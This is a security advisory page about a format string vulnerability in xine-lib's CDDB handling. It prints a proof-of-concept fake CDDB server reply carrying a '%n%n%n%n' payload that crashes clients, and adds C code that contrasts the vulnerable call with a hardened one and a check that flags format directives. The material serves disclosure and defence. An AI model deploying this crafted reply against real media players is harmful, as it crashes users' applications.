
Xine-Lib Remote CDDB Information Format String Vulnerability

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com

A proof-of-concept exploit is available that causes a crash in affected applications. This is a fake CDDB server that returns the following data to clients:

# %n%n%n%n
DISCID=$2
DTITLE=Exploiters / Formatted and Stringed
DYEAR=2005
DGENRE=Rock
TTITLE0=Format
TTITLE1=String
TTITLE2=Bug
EXTD= YEAR: 2005
EXTT0=
EXTT1=
EXTT2=
PLAYORDER=
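
An added example, not taken from xine-lib or from the original advisory: it contrasts the call pattern behind this class of bug with a fixed-format call that treats a CDDB reply line as data, and adds a simple check for flagging replies that carry format directives. The function names, the "cddb: " prefix and the sample constant are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample: the comment line from the fake CDDB reply shown above. */
static const char SAMPLE_LINE[] = "# %n%n%n%n";

/*
 * Vulnerable pattern (kept as a comment so it is never compiled or run):
 *     snprintf(out, outlen, line);      // server text used as the format
 * Each %n tells printf to store the number of bytes written so far through
 * a pointer argument. No such argument was passed, so the store goes through
 * an unrelated value, which is why the client crashes.
 */

/* Hardened pattern: server text is only ever an argument to a fixed format.
 * Returns the length snprintf reports for the formatted line. */
int cddb_log_line(char *out, size_t outlen, const char *line)
{
    return snprintf(out, outlen, "cddb: %s", line);
}

/* Detection aid: count '%' characters that a printf-style function would
 * treat as the start of a conversion. "%%" is a literal percent sign and
 * is skipped. A non-zero result is worth logging for a CDDB reply. */
int cddb_count_directives(const char *line)
{
    int n = 0;
    for (const char *p = line; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {   /* escaped percent, not a directive */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    char buf[128];
    cddb_log_line(buf, sizeof buf, SAMPLE_LINE);
    printf("%s (directives: %d)\n", buf, cddb_count_directives(SAMPLE_LINE));
    return 0;
}
```

Building with -Wformat -Wformat-security makes GCC and Clang warn when a non-literal string is passed as the format with no arguments.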







 

Copyright 2008, SecurityFocus